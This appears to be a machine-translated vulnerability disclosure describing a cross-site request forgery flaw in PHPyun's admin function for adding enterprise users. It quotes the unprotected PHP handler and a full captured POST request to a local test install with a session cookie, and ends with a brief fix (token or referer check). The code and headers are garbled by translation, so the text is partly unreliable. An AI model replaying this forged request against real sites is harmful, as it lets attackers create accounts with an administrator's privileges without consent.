Phpyun # csrf add enterprise users

Phpyun # csrf add enterprise users

Appears in/admin/model/admin_company.class.php

Function add_action () {$ rating_list = $ this-> obj-> DB_select_all ("company_rating", "'category '= 1 "); if ($ _ POST ['submit ']) {extract ($ _ POST); if ($ username = "" | strlen ($ username) <2 | strlen ($ username)> 15) {$ msg = "The member name cannot be blank or does not meet the requirements! ";} Elseif ($ password =" "| strlen ($ username) <2 | strlen ($ username)> 15) {$ msg = "the password cannot be blank or does not meet the requirements! ";} Elseif ($ email =" ") {$ msg =" email cannot be blank! ";} Else {if ($ this-> config ['sy _ uc_type '] =" uc_center ") {$ this-> obj-> uc_open (); $ user = uc_get_user ($ username);} else {$ user = $ this-> obj-> DB_select_once ("member ", "'username' = '$ username' OR 'email' = '$ email'");} if (is_array ($ user )) {$ msg = "the user name or email address already exists! ";}Else {$ ip = $ this-> obj-> fun_ip_get (); $ time = time (); if ($ this-> config ['sy _ uc_type '] = "uc_center") {$ uid = uc_user_register ($ _ POST ['username'], $ _ POST ['Password'], $ _ POST ['email ']); if ($ uid <0) {$ this-> obj-> get_admin_msg ("index. php? M = com_member & c = add "," this email already exists! ");} Else {list ($ uid, $ username, $ email, $ password, $ salt) = uc_get_user ($ username ); $ value = "'username' = '$ username', 'Password' =' $ password', 'email '=' $ email ', 'usertype' = '2 ', 'address' = '$ address', 'status' =' $ status', 'salt' = '$ salt', 'moblie' = '$ moblie ', 'reg _ date' = '$ time', 'reg _ ip' =' $ ip' ";}} else {$ salt = substr (uniqid (rand ()), -6); $ pass = md5 (md5 ($ password ). $ salt); $ value = "'username' = '$ username', 'Password' =' $ pass ', 'Email '=' $ email ', 'usertype' = '2', 'address' =' $ address', 'status' = '$ status ', 'salt' = '$ salt', 'moblie' = '$ moblie', 'reg _ date' = '$ time ', 'reg _ ip' = '$ ip' ";} $ nid = $ this-> obj-> DB_insert_once (" member ", $ value ); $ new_info = $ this-> obj-> DB_select_once ("member", "'username' = '$ username'"); $ uid = $ new_info ['uid']; if ($ uid> 0) {$ this-> obj-> DB_insert_once ("company", "'uid' = '$ uid', 'name' =' $ name ', 'linktel' = '$ moblie', 'linkmail' =' $ Email ', 'address' =' $ address' "); $ rat_arr = @ explode (" + ", $ rating_name ); $ value = "'uid' = '$ uid',"; $ value. = $ this-> rating_info ($ rat_arr [0]); $ this-> obj-> DB_insert_once ("company_statis", $ value ); $ this-> obj-> DB_insert_once ("friend_info", "'uid' = '$ uid', 'nickname' =' $ name ', 'usertype' = '2' "); $ msg =" member (ID :". $ uid. ") added successfully" ;}}}if ($ _ POST ['type']) {echo "<script type = 'text/javascript '> window. location. href = 'index. php? M = admin_company_job & c = show & uid = ". $ nid. "'</script>"; die;} else {$ this-> obj-> ACT_layer_msg ($ msg, 9, "index. php? M = admin_company ", 2, 1 );}

Token not verified and refer

Therefore, csrf is tested locally.



Submit request package

POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1Host: 127.0.0.1Proxy-Connection: keep-aliveContent-Length: 211Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=addAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=

Construct a form and you can use csrf.





Added

Modification of user data also exists, so I will not submit them one by one. Here I am also prompted casually

Solution: 

Add token or refer